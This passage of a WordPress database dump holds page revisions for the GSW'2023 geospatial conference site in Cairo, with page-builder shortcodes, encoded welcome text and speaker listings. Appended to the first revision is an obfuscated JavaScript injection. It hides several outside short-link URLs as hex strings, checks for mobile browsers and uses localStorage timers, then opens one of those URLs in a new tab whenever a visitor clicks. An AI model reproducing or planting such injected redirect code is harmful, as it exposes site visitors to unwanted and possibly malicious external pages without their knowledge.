XN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%20https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665135361340{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 BY\" main_heading_color=\"#f27304\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"https://aast.edu/en/\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"https://www.isprs.org/\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 12:55:46','2022-10-07 12:55:46','',2167,'https://gsw2023.com/?p=2383',0,'revision','',0),
(2384,1,'2022-10-07 12:56:13','2022-10-07 12:56:13','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: 